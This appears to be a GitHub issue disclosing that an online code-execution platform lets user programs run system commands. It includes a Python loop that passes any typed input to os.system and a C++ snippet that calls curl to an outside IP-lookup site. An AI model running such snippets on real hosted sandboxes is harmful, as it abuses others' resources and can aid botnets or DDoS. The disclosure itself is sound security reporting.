Skip to content

Possible exploitation of resources #207

@Mrloyinf

Description

@Mrloyinf

Hey guys, I found that in your programming platform you could exploit the os's inbuilt curl ability and use it to download foreign programs. Possibly for a botnet, a crypto router (node) , or DDOSing . All done through using the inbuilt system libs. Here's poc with python and in cpp.

from os import system

while True:
system(input())

#include <stdlib.h> // Required for system()
#include
#include

int main() {
std::string string;

    string = "curl ip.me";

    system(string.c_str()); // Convert std::string to const char*

return 0;

}

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions